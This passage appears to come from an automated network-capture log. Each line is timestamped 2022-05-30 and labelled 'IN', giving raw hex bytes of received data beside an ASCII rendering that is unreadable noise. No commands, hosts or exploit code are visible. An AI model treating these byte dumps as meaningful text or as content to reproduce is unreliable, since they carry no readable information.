41 8d 92 ab 8d 26 bd 2b e5 12 50 d1 10 4e 1d 67 30 ad be f1 0a 85 2b 95 45 6d 81 ad 22 cf 2d 5f 4e e8 65 61 ba a3 8a 29 8a 6d 64 8f c8 7b 79 e6 58 6f b3 4d 06 63 15 55 1f 4e 27 04 4e 56 98 2c d9 21 d6 52 d2 9d Data Ascii: !xd/?V* xl8DLhk>?NYDWj55&IvMi[}x4+WkkHII%eq(j] 10JZuZhf)={B/=X.3ND^lK;seftp6K$ jA&+PNg0+Em"-_Nea)md{yXoMcUN'NV,!R
2022-05-30 12:45:59 UTC	657	IN	Data Raw: 87 e2 f0 e8 13 3f 2c a1 3a 18 3c 05 df 6b 7b 52 8d f8 5c 98 fb 9e 91 d2 58 fb 62 6a 78 97 4a 89 c3 d6 52 10 b7 57 58 69 ab 4b 6c 99 06 01 d9 15 96 5b 30 80 57 06 55 c8 4b f8 62 17 e0 af 9f 36 c0 ab 4e c1 b7 c0 75 75 bc 58 b9 88 36 a0 a9 a5 12 2e 33 dd 4f b7 fa 6c 66 9a 53 2a 1b 5e 16 5e fd d9 3c 7f e6 e7 9c 0d f6 2f c1 a3 e2 54 43 ab 0a 1a ee a0 d9 0b 2c 31 67 83 cd a5 04 01 18 9b 72 ef 13 2f ab a1 17 d4 f3 7a 50 dc 86 cc 26 a8 28 eb 54 10 8e bb de db 72 e7 28 32 d1 f1 32 4a 8a 0f b7 a0 c4 94 a7 0a 3b 29 9b dd 9f 8a 17 96 18 82 98 f4 4f a5 af d8 57 1d 09 1e 2a a1 e0 29 01 28 29 fb f6 28 ef 9f e5 50 12 80 da 66 7d 89 88 0c e5 e8 e2 d2 69 c6 e2 0f ec 73 83 5a d1 fe c2 25 da dc 68 5d 73 7f d1 36 1e 54 15 67 0d b9 c7 9a 43 cc f9 59 a4 7a fa 33 b2 76 92 03 5f Data Ascii: ?,:<k{R\XbjxJRWXiKl[0WUKb6NuuX6.3OlfS^^</TC,1gr/zP&(Tr(22J;)OW)()(Pf}isZ%h]s6TgCYz3v_
2022-05-30 12:45:59 UTC	658	IN	Data Raw: 93 f4 03 5d ab f6 af 99 fa 88 c6 9f 91 37 6e de d7 cf 4a 26 8d b9 2c 53 1d 03 02 e8 88 1b c5 7f 2d 6a e8 de d6 0b 95 d2 95 c4 5d f2 4c 2c b2 4f de b9 a7 5d 4d d0 7c 26 95 84 0a 7d c4 f5 7b eb 8d 95 1a ba bc b7 cc 16 52 e8 a4 d4 33 46 7e 04 f0 d3 52 31 b9 f3 c3 f4 56 5f ce c8 28 41 6b 55 ba b5 b5 a3 0c 4b b2 18 f1 f6 98 f9 be a4 50 72 12 5e e5 b0 e5 be 64 9c 22 68 53 ab 94 79 08 25 bd c7 93 77 b9 25 54 ed a9 c4 cd f1 db f4 13 9f 91 62 61 e9 ba d3 dc 94 25 fd 25 38 9e 9f 54 e1 47 51 bf 93 ce 2b f6 c2 c5 77 c0 a7 a2 66 39 f4 bc 75 59 47 32 13 6b 4d ac 73 1c 1e 69 42 9e 76 c2 d0 ec b1 45 4a 73 f8 94 07 92 9e 9b 47 44 28 a3 29 ba ef f4 1f ea bd 23 3f 8f 79 fa e7 63 08 96 8e 77 48 47 9e c9 1b 86 dd 84 20 6e d6 67 0d 5c f0 b3 a6 ad 3b f1 ea f1 52 a0 20 c3 b8 cf Data Ascii: ]7nJ&,S-j]L,O]M\|&}{R3F~R1V_(AkUKPr^d"hSy%w%Tba%%8TGQ+wf9uYG2kMsiBvEJsGD()#?ycwHG ng\;R
2022-05-30 12:45:59 UTC	659	IN	Data Raw: 96 9f fa c8 64 55 be 3e 84 2b 7a f6 07 27 5c 77 2e aa 84 84 80 a8 99 cc 35 49 07 ad 51 94 22 00 ed c3 f4 ee 6e 63 ae c4 e7 18 61 a6 20 0b 58 34 ea e1 12 17 07 7e b3 49 05 88 90 c0 91 20 b4 1e 94 86 3b 58 75 8c b7 e3 2d ed 0a fd cf c8 1c 3f 62 c7 cb 92 d7 9c ef 7b 3d 49 df ab 2f 25 e6 cf ee 9c 74 f2 13 6a 75 e9 fb 39 11 d6 98 60 3d c6 48 95 75 f2 c6 6e df 04 51 f5 04 e4 bd 2b e5 12 50 ef 18 c7 15 d5 37 e7 6b 0a 6b ff 9d 95 c3 17 6e c3 41 5e a6 98 93 30 fb d9 88 db f8 f5 01 ab 43 44 57 90 4d 03 bb 90 c9 06 a5 d3 98 e0 0c 82 5b ac e6 a9 43 f4 99 1f 12 99 3a b7 25 0d 89 3c f7 17 d4 fe 6d 5b 69 c5 91 7e 2a fb 40 c2 91 8c 6c 1c bb 30 ef 9d b3 32 56 23 39 0b bb 8b 00 5b a1 0c c3 d4 94 33 99 78 bf 80 8e 42 f3 d9 5d f9 57 19 04 fc e2 4c b2 ec 02 77 bf 03 86 8c 22 Data Ascii: dU>+z'\w.5IQ"nca X4~I ;Xu-?b{=I/%tju9`=HunQ+P7kknA^0CDWM[C:%<m[i~*@l02V#9[3xB]WLw"
2022-05-30 12:45:59 UTC	660	IN	Data Raw: 38 fe 4d a4 78 37 0c 16 c4 99 62 a8 c6 ec cd 49 dd 63 e1 53 c4 b5 9f 94 d5 6e 52 75 63 36 32 48 e2 97 a0 92 9f 8f 85 03 fa 63 93 2a bf d1 67 8c 0b 02 94 5d 82 37 86 b7 10 76 bf c6 e7 dd b2 94 93 e6 48 61 6f 8e e5 23 12 41 10 be 6f 55 62 2b c9 9b 1d 1b 42 87 3d d6 cd 2e 83 aa cc f3 48 b3 61 2d f6 2d 6f ec b4 cc 57 eb ae d8 1a c7 70 6c 09 0f 81 bb 60 f2 68 17 6b 06 01 79 aa 56 52 89 10 4c f4 5f 15 6c 21 ba f4 1c e4 8b 4f 83 58 cf f4 96 b8 96 b3 06 36 fa 73 97 4a 3a 46 c0 a1 5c ee 42 ee bd 96 0f db 9e a6 70 2c 26 c3 82 97 28 d7 eb 9a f7 c7 a6 ee c0 89 44 90 56 ee c6 cd 5e 49 ec 11 76 2d d4 ca d7 ce da b2 5b 13 4c 23 46 cd 34 7e 23 23 fb 4a 5a f9 71 29 0c 91 2d b7 04 42 dc ce 8a 31 e6 7a d3 d4 29 db 18 25 6a 3e 03 8b 42 6d cf 13 9c f9 b6 5c e8 81 c8 98 d3 09 Data Ascii: 8Mx7bIcSnRuc62Hc*g]7vHao#AoUb+B=.Ha--oWpl`hkyVRL_l!OX6sJ:F\Bp,&(DV^Iv-[L#F4~##JZq)-B1z)%j>Bm\
2022-05-30 12:45:59 UTC	662	IN	Data Raw: 3c 11 f3 6d dd 37 64 12 5d 67 62 c5 63 15 e0 e4 9a 81 48 18 6f 33 7b e6 c8 2c 79 6b 71 b8 23 79 95 8f 37 96 b7 8a 37 4a e6 b0 d4 5d f9 1e 89 1a 55 0a d2 ab 48 95 7b 27 44 42 c1 73 68 fa 19 16 00 57 5f bc 13 a6 cb ea 63 e3 55 58 9d 95 4a 88 38 e2 7c a8 cc fe f9 35 38 b2 44 db 8d ee 02 36 4e ae 5b 1f 19 16 87 e5 08 c2 41 f9 97 01 70 d2 13 9d f7 c5 ec cb 73 3d 3e 68 41 5e 8a f3 f4 77 ee 01 6d bf 24 02 7b 95 15 4e 3b 7f db 29 56 f0 6a be da ee 36 54 c9 d9 fd 1a 15 5f 40 28 b6 07 48 77 9e e9 a9 05 72 e8 ed eb 54 58 79 83 2e 91 58 80 9a 29 7f 9f 52 84 a6 76 c6 2b db 46 03 be 87 71 85 24 cd b0 cc ab 7b 37 9b f8 b1 b5 21 06 73 f9 e4 73 6b 0f 79 3b 03 97 4f 66 db 94 b1 d7 2f 95 bc 6c ce a5 ff 23 d7 a7 25 9c 44 59 21 98 40 3d 49 3c 53 01 d1 e1 6e 92 12 d2 d5 49 6e Data Ascii: <m7d]gbcHo3{,ykq#y77J]UH{'DBshW_cUXJ8\|58D6N[Aps=>hA^wm${N;)Vj6T_@(HwrTXy.X)Rv+Fq${7!ssky;Of/l#%DY!@=I<SnIn
2022-05-30 12:45:59 UTC	663	IN	Data Raw: 58 65 bb 83 67 93 6f 9f 70 02 cc 94 69 57 a5 46 5b a1 b8 e5 e0 18 1c d1 24 38 55 f6 f7 6d f0 db d8 99 63 79 4a 8c 87 1f df 83 45 0d 4b d7 1b d4 76 7f 3d 70 22 c0 a7 0c c1 c9 94 16 96 dd 78 d1 89 55 7a 25 29 6f 15 af 0a 20 3a af b8 16 dc bd f2 ca 97 42 7a d9 f1 cb ca 52 fb ce 55 8c 81 0c e7 12 71 a1 6e 43 c1 f6 e9 ed 58 7e 29 fc 60 92 17 a6 00 e7 36 66 d9 22 18 26 fd f3 ff 1d 15 e7 b3 76 21 7c ce ef 0e 2e 8b 42 c2 52 82 c4 28 d4 35 46 9e 1c 66 f9 fb 31 c8 3a 12 b3 55 24 74 c2 55 6f b8 df 5c 93 76 e7 5b d3 53 11 dd 32 e6 9d 77 39 9f a5 98 bd 78 5b 62 32 55 f1 95 1b d3 1f 0b 92 c0 25 64 be de 70 01 ea 87 d4 03 95 e2 25 73 76 43 81 9f 69 90 b4 b9 7c ba b2 1d 03 ca 28 4b e4 bd 21 e2 0f 58 22 45 94 be 3a 46 c1 23 38 ea 73 19 43 2a 1e c0 85 f8 b7 75 46 0c b1 33 Data Ascii: XegopiWF[$8UmcyJEKv=p"xUz%)o :BzRUqnCX~)`6f"&v!\|.BR(5Ff1:U$tUo\v[S2w9x[b2U%dp%svCi\|(K!X"E:F#8sC*uF3
2022-05-30 12:45:59 UTC	664	IN	Data Raw: d2 b4 b3 e5 1a 58 66 4d 6a e0 27 c5 50 06 ae a4 96 14 9e e2 54 b3 22 fe 30 19 2d ec bc e5 99 8b 24 e4 b1 1a 48 dd 97 8a 03 9e 28 82 9c 7f 80 85 23 6a d0 44 2b be 81 ae 0c a1 41 23 56 b3 3b 0b 78 dc 23 7b 64 3b 01 7d 75 0a a8 ed 0d b3 45 2d 53 79 79 6d 71 7a af 65 4c 0f 89 d2 34 37 e8 17 36 cb 2b c7 6a 43 ad eb 76 db 13 85 e4 30 62 5b 00 0a 20 ce 4f fe 63 0b d2 06 aa 30 d5 8e 36 9a fd c0 18 f5 11 c7 8a 11 c3 cc 4c 66 cd 85 f1 e1 94 64 bb 24 b7 9c f5 29 99 e3 8a ce e1 12 b8 55 45 06 84 ca d9 f4 48 5b cf cf aa e9 a2 50 a5 63 7b 42 eb 31 33 ab cf 12 1d 7c 80 c9 12 28 63 13 4b 07 ad 65 5d 91 b7 d4 e6 b0 67 22 ca d6 db 0a 9a f9 5a e4 33 d8 8d 2d 89 7e eb d1 ed 68 86 a5 24 39 bc b2 7f a1 a6 e0 6a 03 1f c6 60 80 2c de 7b 4b 67 a5 10 51 fe f2 61 fb 17 85 94 3f 1f Data Ascii: XfMj'PT"0-$H(#jD+A#V;x#{d;}uE-SyymqzeL476+jCv0b[ Oc06Lfd$)UEH[Pc{B13\|(cKe]g"Z3-~h$9j`,{KgQa?
2022-05-30 12:45:59 UTC	665	IN	Data Raw: ab d5 03 c4 46 ec a6 1f d2 fa 4d 46 49 d2 ad a2 aa bf 8c 47 3e a5 1e ce df a5 e8 b3 da fa aa 80 c8 ab 85 de 98 b0 73 a3 ad 38 59 7d d4 0b 9d db da e0 48 7c 99 77 99 c7 68 86 33 06 f4 3c 01 04 4e 22 90 dc 50 98 27 e0 bc cc d3 cf b5 6a b6 ef b3 38 e6 e2 48 38 b6 c3 43 eb c6 27 13 e5 2b 37 b1 b6 fe 11 77 d9 c3 28 13 02 86 8f 47 dc 51 0e 31 94 84 e1 f1 81 b3 c6 a0 1d 51 be 86 12 8f f7 bf e6 a8 02 b7 f2 ff d7 51 e0 59 54 ff 6f 7c 99 f6 d3 01 e3 10 9a 9d 8c 6e 58 ae 01 7a cb b1 9c 2e cc 5d ff 87 54 cb 01 35 09 f4 49 54 ca 22 cc 12 27 0e 77 e9 d4 c3 49 03 3b b4 2d 3e 73 c3 5e 3c 67 19 36 19 cd b7 69 19 e7 e8 d4 de 64 88 af 6b 93 f3 97 f9 d3 67 f4 70 5b 81 41 ab f5 58 65 7a bf 63 b6 d3 09 ed 40 02 ed ba 88 5a 22 ff a1 6e 66 f2 ac 03 62 29 c7 7c e5 37 dd fe e6 cf Data Ascii: FMFIG>s8Y}H\|wh3<N"P'j8H8C'+7w(GQ1QQYTo\|nXz.]T5IT"'wI;->s^<g6idkgp[AXezc@Z"nfb)\|7
2022-05-30 12:45:59 UTC	667	IN	Data Raw: 60 f1 7e 67 d4 08 9e 97 cb 17 52 92 ad 10 58 e9 db c6 cf 61 96 13 a9 f5 c0 2f cf c6 5b 6c d1 de d5 7b 2e 8e a2 38 53 40 1b 8a e3 ab e6 84 cb 67 99 0c f3 51 8b 92 94 03 1c 61 45 16 3e 15 f1 3e f5 91 57 7b 81 a7 64 d2 69 d0 f2 d8 b7 ee 7f 94 65 15 2b c8 e7 87 da 14 a9 62 f2 5a 48 a4 38 b6 6d 0d b5 45 c0 80 0c 27 b4 38 2a 0f fb 03 83 6c d6 c8 45 9a 1a ad 72 f8 83 4e 71 86 e1 68 08 e6 0d ed 4f 3a 25 12 82 a6 04 a7 90 00 e1 4f f0 80 cf e5 56 1a 3e b7 db fd 74 d6 5b ec f7 94 44 61 9a 42 3c 2c 67 5d 69 4b 35 c3 b1 a7 f8 9f f1 37 53 38 c3 72 fd 34 91 88 b9 f3 b7 8f d9 7c d5 37 63 53 43 6f 76 fa a2 c0 1c 1a e3 18 4f 7b e3 a3 eb c7 02 18 22 49 31 6a 02 cc ab 40 9d fb 17 d1 be 86 f7 2d 37 c3 93 48 c2 a5 ab 39 50 3b b9 3c a1 d4 39 22 8f cb 04 1e 16 34 5d 16 19 9b 62 Data Ascii: `~gRXa/[l{.8S@gQaE>>W{die+bZH8mE'8*lErNqhO:%OV>t[DaB<,g]iK57S8r4\|7cSCovO{"I1j@-7H9P;<9"4]b
2022-05-30 12:45:59 UTC	667	IN	Data Raw: cd 25 d5 89 cc 34 c7 cc 44 0d c0 c8 7b 6c 32 b8 79 d9 4a f8 b3 e4 fc bb 2b e5 44 5c 28 ee 33 9a ca 15 02 2b 31 83 0e 38 3a 97 88 c2 f8 a9 23 fd 5b d5 40 cc 15 11 ad 93 0b 1f ab 1c 20 7e 93 a5 f2 d5 23 12 9d 20 d3 f5 eb 0c 82 2f 8c 40 c6 8e 84 e2 44 d5 76 c2 75 4f 0e 89 9a 99 d5 e8 7b c7 8e f2 75 15 02 59 14 bf 3d 0c 52 db 8f 2c 19 7a 4b d4 ca 72 0b b2 81 32 b3 16 0f f7 5b 92 05 ea fa ef 44 d5 dd fb 67 9d 9e 5d a8 19 c6 41 b0 a8 26 e5 52 9e ba 6d 14 89 fa 2d c5 3d cc 68 76 c9 61 9d ed ca fa 38 eb e8 de 5d f5 59 94 58 b0 f4 8a e3 74 7e e3 0f 22 a7 fb 37 50 23 96 f7 f5 1d aa ac ff 9d e1 a9 e2 46 19 be 10 db eb d0 45 00 a2 98 e9 be bc f5 c8 52 81 33 56 81 f7 32 7b e6 45 e9 31 5f 38 8b 17 33 f3 06 a3 e7 ab fe 8c 37 73 fb e0 54 f1 dc 5e 7a a8 7e df 2c 35 5a 1b Data Ascii: %4D{l2yJ+D\(3+18:#[@ ~# /@DvuO{uY=R,zKr2[Dg]A&Rm-=hva8]YXt~"7P#FER3V2{E1_837sT^z~,5Z
2022-05-30 12:45:59 UTC	669	IN	Data Raw: b1 10 60 4e 81 b8 30 a5 38 c9 c2 7f 08 fd bf 87 97 1c 33 21 c4 f6 1c 92 5f ef 53 c6 80 d0 ef 1b 40 6f 66 8f 4f 64 a4 a6 cf 31 f3 08 ea 75 4c ab 8f e5 c9 fe 63 47 3b 32 fd 9d e0 a4 87 f2 a5 1c df d8 16 a0 72 83 4e c4 ce e5 d4 2b ad be eb 27 7d bb 9d 76 14 ac 2c 6c b0 41 0a 6d a1 c3 33 bf 0f 00 12 37 7a d7 1f 8a 4e ab c5 be 1d de 85 87 c7 a3 b0 b3 a9 6c e6 3f 4e b7 76 c9 07 55 4d 06 84 70 7d e3 18 f4 b7 60 c6 44 ee 57 73 db 43 42 d7 71 41 5c a7 2e 8e fe 92 83 23 0c 28 7d c2 40 f5 41 bc 24 78 84 da f7 92 4a c2 f9 27 8d 1c 31 40 0f 45 63 24 31 45 82 f8 75 dd 1c 35 0a 60 96 2c 30 06 34 b1 b9 79 d7 2c b2 d3 97 fc 0a f6 25 cc ce 4d e6 c2 8c be 3f 94 c1 b0 74 1f ec 37 6e 04 a3 22 86 fb f2 bf bb d8 88 1d 81 ca 81 7b c6 d0 b8 60 19 21 45 d6 a4 16 94 f2 9a 8f 88 83 Data Ascii: `N083!_S@ofOd1uLcG;2rN+'}v,lAm37zNl?NvUMp}`DWsCBqA\.#(}@A$xJ'1@Ec$1Eu5`,04y,%M?t7n"{`!E
2022-05-30 12:45:59 UTC	670	IN	Data Raw: 44 05 f8 aa 76 54 16 e3 b5 f9 99 32 9c 89 12 43 8c f7 57 14 02 b5 61 76 dc d4 a2 6b e9 6a 67 af c4 7b 83 05 e0 0a df 7a cf 5f 42 95 c2 a7 b9 42 ef 12 92 ac 75 92 70 53 2a 78 b0 3e cc e3 3e c7 49 15 2f 25 b7 7e 13 00 5a c3 c5 cf 51 48 45 8c 09 34 dd 4d 19 c6 a0 1d d0 0a ee 69 05 ac a6 8f 8c ea 27 0d 8d 64 9e d9 09 b3 10 90 83 4c 8d 6f d9 d6 9a d6 60 9f eb 8a 25 ba 34 03 e0 ce c6 e5 ee db 3f d7 0f 0d 8b 85 13 cd ef a7 cd 33 d1 0d 3a fe 2a 22 49 27 fe 6f d6 91 0d b3 00 7b e4 4b 1d 53 9c cd 84 a9 ac a8 e8 75 7e e5 cd af 58 d8 a4 e2 c6 c6 1f b5 b8 17 96 bd 80 c6 b7 70 06 75 d6 ef 65 3f 5b fe 46 cc 9d a3 17 ad 50 98 45 ca 2a d8 0c d2 c8 3f 81 15 cd 28 bd 49 96 c1 a5 fa 2b 8e 3a 08 70 30 7c d8 71 6f f8 d7 ad a1 33 27 77 39 44 23 69 70 8f 05 bb e3 94 eb 4b 11 d1 Data Ascii: DvT2CWavkjg{z_BBupSx>>I/%~ZQHE4Mi'dLo`%4?3:"I'o{KSu~Xpue?[FPE*?(I+:p0\|qo3'w9D#ipK
2022-05-30 12:45:59 UTC	671	IN	Data Raw: 73 71 d6 9e 3d af 07 c1 9e 54 90 98 ba 2e 57 31 14 27 26 14 95 0e c6 64 b9 b0 42 61 6c 8e d1 c3 d3 d0 0f 03 d4 c1 52 0f 4c 66 e0 0d d9 46 7e 4e 9a d3 b5 0c 36 14 20 a6 a1 b4 8e 0f 6f 33 fd 41 ba fd 93 3f f3 ad 00 58 16 0f bb 88 47 d8 e5 13 36 53 c3 ae 76 71 a8 0a 40 d3 ec 80 c6 82 34 65 d2 fa 10 6b 9d e0 d6 0a b9 43 1e b0 39 c6 ec a1 c6 3e df b4 a6 5d 4d c9 0e 6b dc b4 09 d6 6f 33 f0 db 88 72 54 b4 cb 3c 17 dd 88 eb 15 42 ec 27 a2 b4 31 ef 1e f6 7e 09 3c 77 f2 74 72 09 2e d4 8c e6 54 97 9a f0 fa b5 4d 6c fe 41 ae 1e 9a 93 51 72 d1 f4 1a 78 15 0b 27 b8 1e ba c3 20 4e 72 85 ae 79 be 1f b2 76 19 a7 50 ef c4 c1 b4 a2 1f 06 9d 39 c6 74 d2 43 b1 fc e8 92 76 e1 61 aa cf aa b7 9c 1c 3a 2f cb 8e 37 22 3e 8f 84 6b fb 2d e9 1c 13 25 e9 46 e4 20 67 43 b6 dd 95 4c 2f Data Ascii: sq=T.W1'&dBalRLfF~N6 o3A?XG6Svq@4ekC9>]Mko3rT<B'1~<wtr.TMlAQrx' NryvP9tCva:/7">k-%F gCL/
2022-05-30 12:45:59 UTC	673	IN	Data Raw: 99 e6 64 ea aa c0 c1 c0 6e d0 9b 82 df 26 f9 77 fe a1 09 38 56 ec c8 5e 3c 53 f1 f6 e4 e7 0a 88 f1 cd a5 61 0b 46 1d 3a 48 83 f5 fd c0 d0 c9 b6 e9 22 ad 40 07 65 2d 70 26 bb de fe 37 a4 00 c0 d0 97 85 18 07 09 25 d6 ff bd 69 37 05 84 1f 58 a2 ce 89 e6 84 87 f5 84 ff 07 2f ff 63 8c d6 cd db 27 9d e3 f1 7d 77 9a ee dd f5 90 e6 7d 6f c1 1a 00 21 34 37 77 8c 11 57 24 ec 74 1d 34 5b 0a 6f 59 d3 01 0d d7 84 d9 b3 ec 42 da 33 a0 62 91 1d 68 f8 61 99 e0 f0 9c e7 65 d4 2e 9d dd 4c c6 d4 b7 a8 d9 ff 77 5e 48 0c 0b 72 78 93 3a c8 44 86 8a df 3e f8 32 7f 38 50 76 9a e2 0c 06 43 bc 5c 58 d9 2b ce 8b fd 08 ce d7 23 ba 72 6b ab b8 7a cc 85 fe 2d 65 eb b3 dd 7d 6d b7 8a 2c 53 fd 66 24 88 8f 1f 10 c4 fa 58 a8 77 89 ff 7d dd 10 34 7c 5c 12 5c dd 8d f2 99 25 cf d9 23 10 96 Data Ascii: dn&w8V^<SaF:H"@e-p&7%i7X/c'}w}o!47wW$t4[oYB3bhae.Lw^Hrx:D>28PvC\X+#rkz-e}m,Sf$Xw}4\|\\%#
2022-05-30 12:45:59 UTC	674	IN	Data Raw: c9 4a 1d 80 4c 99 0a 38 ee c0 00 77 94 e2 ed 58 e5 bd 80 a0 7b d9 c7 af c6 c8 7a 4d 4e 01 12 09 b4 72 fd f9 d9 bd 5e a9 6f 1a 9e 23 82 3a 53 1f 79 98 a1 6a e6 17 b5 c2 fc b4 a4 90 01 c9 50 7a 54 68 2d 06 03 d0 fe f9 5c 91 fc ac ea fe a3 29 2a 15 1e 84 f9 90 1a bb af 3f d5 e4 99 98 6a 64 8b b7 68 6f f8 17 c1 ca 1a ce af c8 2c da f5 39 14 62 dc 40 51 a5 74 47 97 88 a2 7f 18 2e a9 56 fe 98 7b 8f 7e 9b a8 6a 28 db 98 86 4f e3 c6 07 b1 b2 82 8a 57 9f 6c 07 84 d7 cf 2e fe bb 27 0d 90 d8 a1 2d 00 29 e8 8a 1a 44 df a7 ab cb 77 48 fe 45 9f 0b 0a b6 eb 24 26 17 bc 89 8f c0 ca a1 41 47 3a 97 ce 9a a8 9b fc 08 22 e6 3c 75 a2 e6 c5 e4 f5 61 39 68 ee c7 63 71 e2 0a 9d db ce 02 ae 7a 38 2b 19 ae 95 0f 5e 21 df 23 2c 1f ef 57 e8 63 20 57 dc f7 a5 a0 9c f5 bb 60 01 15 26 Data Ascii: JL8wX{zMNr^o#:SyjPzTh-\)*?jdho,9b@QtG.V{~j(OWl.'-)DwHE$&AG:"<ua9hcqz8+^!#,Wc W`&
2022-05-30 12:45:59 UTC	675	IN	Data Raw: f2 be 28 0b 11 8e f2 04 77 4d 5d fd d2 30 53 1a 9e 8a f4 22 33 bd 8e 05 c6 c7 e4 0d 66 32 ad b8 08 e9 de 5d 16 e8 92 12 f7 3c c6 4a 2f 8e a8 70 cd 67 a2 b2 90 bf e0 e3 3f d1 dc 2a 03 31 e1 a9 3e 16 c3 45 c7 63 ec d0 e5 08 a2 98 e9 81 c0 e7 7d c3 b6 00 0c 9f 4f f3 3d e6 48 d8 1d 4f 19 21 f4 5a 3e 76 4f 39 5d e9 9c 9b 09 c4 1f 9e 8d c4 2c dc 64 15 be dd 47 e1 b4 c4 bc 6d fd fa a6 ba a1 1e 39 f1 98 06 ec 41 f0 49 b7 ff b6 53 9b 98 aa a1 c5 03 08 03 63 bb 78 e2 79 5a cf 54 de 6f 82 0a 4c a9 77 78 a9 c5 42 05 c6 6e e0 29 68 60 f7 59 cc c9 eb b9 06 b2 e3 6c 03 96 c9 d3 79 49 22 7d 79 f1 eb 8f db d6 73 4f 7f 6a 4f b1 af e8 37 33 9f c2 e0 61 f0 e0 12 1b 77 49 b6 87 7e b1 a2 af 2b 55 ba fd cb 4f b4 40 21 d5 d5 67 0d 37 bd bf d1 d4 7d 64 1f 68 0b 4d cf 03 2e c8 e7 Data Ascii: (wM]0S"3f2]<J/pg?*1>Ec}O=HO!Z>vO9],dGm9AIScxyZToLwxBn)h`YlyI"}ysOjO73awI~+UO@!g7}dhM.
2022-05-30 12:45:59 UTC	676	IN	Data Raw: 6e 2a 62 68 d5 b5 e6 b7 51 ed 12 2f 7b 82 60 e6 1d 78 90 d6 10 01 4b 6c 47 b5 fc 4a 3c 68 c5 a0 c2 7f 96 66 06 62 19 d7 95 9e 61 90 b2 2b 8b 67 24 73 fb 0f dd e2 6e a5 35 15 51 12 94 ed a0 06 8d af 68 39 9f b3 6f 69 05 ff 8f 26 d4 1d 6e f8 d0 c7 9e 7e 94 6d 94 3c 4f 20 a5 45 74 df 8c 06 3e 07 fc 98 4f d4 09 03 77 fb 24 47 02 09 bd 58 07 f2 46 ce fc a2 73 c2 2c cf 00 ba dc 93 58 2d 00 1d f7 11 5e ba f7 df 3e 35 49 7b a9 83 7b 67 f8 29 23 ae 58 43 30 75 ee c3 fb 92 84 0f 2f 3e ce d1 2c a1 ba 99 87 39 0e 93 3a 1d d0 87 72 b2 56 91 88 a2 2f 4f 24 5f 17 3c 9d 88 19 7c 56 dc 9d ba d2 f4 40 d9 9e 50 d0 0b 14 35 3a df 42 7c 66 eb 34 e9 47 7d a2 22 63 b2 0e 36 97 12 b2 56 0c c3 55 ec f7 bb fd 7f 88 97 f4 30 33 4f 7a d2 0e f4 3e 83 9c 91 1a 79 e5 de 16 b7 91 d5 4d Data Ascii: n*bhQ/{`xKlGJ<hfba+g$sn5Qh9oi&n~m<O Et>Ow$GXFs,X-^>5I{{g)#XC0u/>,9:rV/O$_<\|V@P5:B\|f4G}"c6VU03Oz>yM
2022-05-30 12:45:59 UTC	678	IN	Data Raw: d0 65 84 30 bc 0e 91 30 d3 ea fe d1 79 ea f6 67 3a 8c 95 9d 8e 35 c3 42 23 0a d8 12 8f 6e b7 ab 29 f9 e8 75 32 e4 cd af 58 1d 6b 03 7f d3 0f a4 a9 52 a5 2b e0 93 8a 23 7a cb 86 27 16 ba 98 48 8a b5 2e d6 d7 06 bf cd c3 4f 40 a4 c1 af d9 14 75 85 d7 10 ff c2 e4 c8 22 4e fd 4d 61 b0 e7 24 2d dd 87 e8 f8 1a 44 a9 fe 66 73 58 4c 95 81 73 bb c7 bb 8b 00 34 52 35 93 29 28 60 43 07 fd 2f b7 6f 21 57 57 72 e1 cf 63 69 96 fa d8 88 0c a1 c2 2d aa f5 04 c9 ef c6 cb 34 c7 fe 07 a2 a0 69 c3 be 6d c3 4a db b7 08 3e 65 14 e7 65 d4 08 48 ac 9a c4 29 a1 08 0d fd 08 6c 54 43 a9 9e fd 55 77 0e fd 1a f2 c2 ae 8d 85 8e 11 dc 75 23 4e 2e 0d 74 3b 78 6e 6a 96 2b 64 a2 2a d2 6e 05 c8 36 cb db 0d 92 e2 43 ed d8 01 95 93 bd 21 44 1c 32 bd 17 1a ae b7 37 b8 e4 ee 06 2e d2 84 e8 b3 Data Ascii: e00yg:5B#n)u2XkR+#z'H.O@u"NMa$-DfsXLs4R5)(`C/o!WWrci-4imJ>eeH)lTCUwu#N.t;xnj+d*n6C!D27.
2022-05-30 12:45:59 UTC	679	IN	Data Raw: 3a ac 08 44 37 d0 f1 9f 6b 04 41 40 76 cc b1 78 29 c1 5a 78 08 74 0a c4 c3 1a 30 02 11 f2 22 85 7b fc 3f e5 0d 9a c1 f6 3b 94 37 7d 7d ef 69 19 8b cb ad f1 1e 59 0c 3b 1f e2 7b 4f 49 ad 19 ee f0 80 25 e3 c6 aa 76 38 89 ec d0 ef e5 20 46 bd 2d 91 f3 d2 e9 a9 69 7a a9 b0 c0 c3 6c 06 d2 a1 e5 45 38 e0 c9 9c 83 fc d9 75 8f 13 25 b1 3f 48 83 ec de c0 3c 73 e6 93 49 cf e1 b9 cb 43 79 4a 09 85 19 c9 cb 97 09 e9 e6 b2 7c af d9 b9 ba 05 63 0f 69 54 20 8b c2 9d f0 e3 25 8e ad c4 77 4c 45 8a 7e 6b f2 9f a3 a6 10 4e 97 c8 d0 d3 b5 b5 db c1 2e f2 8b 0e ad c3 0c fc af df 51 ac 94 07 c9 6a 4d cd 73 cf d1 fd 48 94 99 d8 d7 ef 90 00 5c 9f 79 ba f9 a2 92 69 10 0f 97 48 2d a6 ad 7c de 92 ad ae d9 56 49 44 ad 0e c7 4a 5d 0a ac b3 da c3 a8 4d fc 5d 61 a9 b0 a1 d3 bb 1d e7 3a Data Ascii: :D7kA@vx)Zxt0"{?;7}}iY;{OI%v8 F-izlE8u%?H<sICyJ\|ciT %wLE~kN.QjMsH\yiH-\|VIDJ]M]a:
2022-05-30 12:45:59 UTC	680	IN	Data Raw: 34 14 b5 6f 68 21 9b 4a 22 5d 1a b0 0c 89 c0 a5 62 97 1f 85 cf 33 44 2e 30 e8 da 52 98 94 99 f3 4e 19 dc b6 7e 8f d6 5c cc 44 0d 3f 39 50 4a d4 bb 76 d7 b2 dc a7 0c a7 4d bb 54 e9 54 9e 6f 8b ee 38 3e cd 75 21 00 6a 44 78 88 5c 04 d8 cf 2c c1 dd 66 36 45 da cb d1 63 18 08 4f 5b 62 d1 a9 aa 2b 54 09 39 f2 6c 5d 97 7f 13 1b d7 6e 16 1f 42 c1 1d b6 de 42 b4 92 bf 3f 10 6a 26 1a 0b 32 54 0a 4b f1 30 37 75 db 3d 75 df 79 8c e5 47 65 b9 ca 5e 41 1d 45 4a 81 40 6f c8 13 a1 6a cc 3a 31 23 18 91 8f 9b 9c 10 b5 f8 3b f6 45 61 cb 05 b0 50 66 ea 46 35 9c 84 a5 17 d2 7c f6 01 e5 e6 c9 9b 12 8b c5 95 